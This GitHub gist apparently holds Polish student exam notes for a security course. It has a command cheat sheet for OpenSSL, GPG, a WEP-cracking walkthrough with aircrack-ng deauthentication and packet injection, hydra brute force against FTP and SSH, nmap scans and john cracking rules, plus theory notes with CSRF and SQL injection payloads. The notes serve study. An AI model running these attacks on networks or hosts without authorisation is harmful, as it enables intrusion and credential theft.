Last active
June 11, 2018 12:16
-
-
Save mkondratek/e206d3f0fa196e795bbfcaad93142f3c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#TODO place this file on gist | |
[1,openssl] openssl aes-256-cbc -salt -in secrets.txt -out secrets.txt.enc | |
[1,openssl] openssl aes-256-cbc -d -in secrets.txt.enc -out secrets.txt.new | |
[2,openssl] openssl dgst -sha256 -sign srvexam.key -out secret.txt.sha256 secret.txt | |
[2,openssl] openssl dgst -sha256 -verify <(openssl x509 -in srvexam.crt -pubkey -noout) -signature secret.txt.sha256 secret.txt | |
[x,openssl] openssl req -newkey rsa:4096 -nodes -keyout srvname.key -x509 -days 31 -out srvname.crt #gen key and crt | |
[x,openssl] openssl req -key srvname.key -new -x509 -days 31 -out srvname.crt #gen crt from key | |
[x,openssl] openssl x509 -signkey srvname.key -in srvname.csr -req -days 31 -out srvname.crt #gen crt from key and csr | |
[4,gnupg,pgp] gpg --output doc.gpg --encrypt --recipient blake@cyb.org doc | |
[4,gnupg,pgp] gpg --output doc --decrypt doc.gpg | |
[5,openssl,self-signed] openssl req -x509 -newkey rsa:4096 -keyout sskey.pem -out sscert.pem -days 365 | |
[5,openssl,self-signed] openssl verify -untrusted sscert.pem sscert.pem | |
[6,fileextraction] todo (archive? file signatures?) | |
[7,wep] #monitoring mode | |
[7,wep] iwconfig | |
[7,wep] sudo ifconfig wlan0 up | |
[7,wep] sudo airmon-ng start wlan0 | |
[7,wep] ifconfig wlan0mon | |
[7,wep] #scanning | |
[7,wep] sudo airodump-ng wlan0mon | |
[7,wep] sudo ifconfig wlan0mon down | |
[7,wep] sudo iwconfig wlan0mon channel 4 | |
[7,wep] sudo iwconfig wlan0mon | |
[7,wep] #pockets injection | |
[7,wep] sudo airodump-ng mon0 | |
[7,wep] sudo iwconfig mon0 channel 4 | |
[7,wep] sudo aireplay-ng -9 -e ConnectEverybodyNow -a <MAC AP> mon0 | |
[7,wep] solution #1 | |
[7,wep] #Najpierw sprawdzamy, czy ktoś jest podłączony do punktu dostępowego: | |
[7,wep] sudo airodump-ng -c 10 -a --bssid <MAC AP> wlan0mon | |
[7,wep] #Nasłuchujemy komunikację z wybranym AP i zapisujemy ją do pliku: | |
[7,wep] sudo airodump-ng wlan0mon -c 10 --bssid <MAC AP> -w wep_1 | |
[7,wep] #Teraz czekamy, aż uprawniony użytkownik się zaloguje. Jeżeli nie chcemy czekać, możemy wysłać pakiet rozłączający klienta: | |
[7,wep] sudo aireplay-ng -0 5 -a <MAC AP> -c <MAC Klienta> wlan0mon | |
[7,wep] #po tym poleceniu należy sprawdzić, czy w pojawił się plik z rozszerzeniem xor - w tym pliku jest strumień klucza, który będzie nam teraz potrzebny do sfałoszowania uwierzytelnienia: | |
[7,wep] sudo aireplay-ng -1 0 -e HackingExercises -y wep_1*.xor -a <MAC AP> -h aa:bb:cc:dd:ee:ff wlan0mon | |
[7,wep] solution #2 | |
[7,wep] #Podobnie jak wcześniej nasłuchujemy pakiety wymieniane z wybranym AP i zapisujemy je do pliku: | |
[7,wep] sudo airodump-ng wlan0mon -c 10 --bssid <MAC AP> -w wep_2 | |
[7,wep] Widać, że przechwyconych pakietów jest mało (a potrzebujemy kilkadziesiąt tysięcy pakietów), trzeba proces przyspieszyć przez wstrzykiwanie pakietów ARP | |
[7,wep] sudo aireplay-ng -3 -b <MAC AP> -h <MAC Klienta> wlan0mon | |
[7,wep] Gdy liczba przechwyconych paczek będzie rosła za wolno, można spróbować zdeautentykować użytkownika, po ponownym podłączeniu wszystko zacznie działać dużo szybciej | |
[7,wep] Po chwili okaże się, że możemy spróbować złamać hasło: ```bash sudo aircrack-ng wep_2*.cap | |
[8,sqlinjection] todo | |
[9,xssinjection] todo | |
[10.peanalisis] strings #search for strings | |
[10.peanalisis] https://www.virustotal.com/#/home/upload | |
[10.peanalisis] hexdump -C file.exe #https://en.wikipedia.org/wiki/List_of_file_signatures | |
[11,metasploit,msf] https://www.offensive-security.com/metasploit-unleashed/ | |
[12,hydra] hydra -l user -P passlist.txt ftp://192.168.0.1 | |
[12,hydra] hydra -l root -P passlist.txt 192.168.0.1 ssh | |
[13,nc,nmap] nmap -A -O 192.168.43.1-255 | |
[13,nc,nmap] nc -vz 192.168.43.250 20-80 #test for opened ports | |
[14,john] place custom rules in john/run/john.conf | |
[14,john] cAz"[,.!?@#_][0-9]" #capitalize first letter, use one special character and one digit | |
[14,john] john/run/john --format=Raw-MD5 --rules=some_rule --wordlist=./dict.txt ./hashes.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[1,rsa] | |
[2,block_cipher] CBC(cipher block chaining), ECB(electrionig codebook) | |
[3,ssh,connecting] | |
[4,ssh,tunneling] | |
[5,ssl/tls] | |
[6,pki] Public key infrastructure - jednostki i procesy do zarządzania | |
[6,pki] tworzenia, przechowywania, reaktywowania certyfikatów. | |
[6,pki] Szczególnie stosowane w ebiznesie, bankowości, administracji | |
[6,pki] oraz poufnej komunikacji. | |
[6,pki] CertA, RegA, VerA | |
[6,pki] | |
[6,pki] | |
[6,pki] | |
[6,pki] | |
[6,pki] | |
[7,gpg] | |
[8,web_of_trust,wot] | |
[9,vpn] | |
[10,ipsec] | |
[11,tor] | |
[12,crpytography_vs_steganography] | |
[13,trivial_bits_cipher] | |
[14,chaum,blind_signatures] chaum proposal | |
[14,chaum,blind_signatures] -tajna kwota, odbiorca i czas | |
[14,chaum,blind_signatures] -mozliwosc odtajnienia | |
[14,chaum,blind_signatures] -mozliwosc zablokowania kradzionych pieniedzy | |
[14,chaum,blind_signatures] podpisujący zna s' (trudna do odwrocenia) | |
[14,chaum,blind_signatures] publiczna s, s(s'(x)) = x | |
[14,chaum,blind_signatures] dostawca, odpowiednio c i c', c'(s'(c(x))) = s'(x) | |
[14,chaum,blind_signatures] proces: dostawca wysyła c(x) | |
[14,chaum,blind_signatures] podpisujący odsyła s'(c(x)) | |
[14,chaum,blind_signatures] dostawca oblica c'(s'(c(x))) czyli s'(x) | |
[14,chaum,blind_signatures] można sprawdzić czy podpisujący podpisał licząć s(s'(x)) | |
[14,chaum,blind_signatures] | |
[15,goofy,scrooge] goofy ma monete podpisaną kluczem z informacją o twórcy i id | |
[15,goofy,scrooge] przekazanie alicji, hash referencji na monete, informacja | |
[15,goofy,scrooge] o tym że alicja jest nową właścicielką i podpis goofiego | |
[15,goofy,scrooge] alicja może podać monetę dalej | |
[15,goofy,scrooge] wady: wielokrotne użycie monety | |
[15,goofy,scrooge] sknerus jest wydawcą monet, akceptuje i podpisuje | |
[15,goofy,scrooge] lub nie transakcje | |
[15,goofy,scrooge] sknerus ma pełną kontrolę, a my mu nie ufamy | |
[16,btc,miners] | |
[17,wep] | |
[18,wpa] | |
[19,csrf] cross site request forgery | |
[19,csrf] Wykorzystuje konkretną witrynę i jej zaufanie do użytkownika. | |
[19,csrf] W nieświadomości klienta podejmuje możliwe złośliwe akcje. | |
[19,csrf] Zależy od podatności przeglądarki na odbieranie i wykonywanie | |
[19,csrf] złośliwych pakietów. Nie wymaga JSa. Złośliwy kod | |
[19,csrf] znajduje się u atakującego. | |
[19,csrf] <img src=”https://www.company.example/action” width=”0” height=”0”> | |
[19,csrf] onload='document.form.submit()' | |
[19,csrf] from, method=POST, hidden values | |
[19,csrf] niekoniecznie zmienia treść stron, może dotyczyć FTP (vs XSS) | |
[19,csrf] hasła jednorazowe! | |
[19,csrf] czas ważności sesji | |
[20,xss,sql,injection] SQL INJECTION | |
[20,xss,sql,injection] 1=1 | |
[20,xss,sql,injection] boolean, union | |
[20,xss,sql,injection] dos, x' AND BENCHMARK(999999,MD5(NOW()))=0 OR '1'='1 | |
[20,xss,sql,injection] multiple statements, seperated with ; | |
[20,xss,sql,injection] p r e p a r e d s t a t e m e n t s | |
[20,xss,sql,injection] XSS INJECTION | |
[20,xss,sql,injection] fora, komentarze | |
[20,xss,sql,injection] phishing - wyłudzanie informacji | |
[20,xss,sql,injection] kradzież ciasteczek | |
[20,xss,sql,injection] s a n i t i n p u t | |
[20,xss,sql,injection] XSS INJECTION VIA SQL INJECTION | |
[21,malware] rezydentne, makro (biurowe), polimorficzne (auto szyfrowane), | |
[21,malware] metamorficzne (zmieniające swój kod) | |
[21,malware] backdoor, keylogger, file binder, szantaż, adware, koń trojański | |
[21,malware] form grabber, hoax (nitki), rootkit (file hiding) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment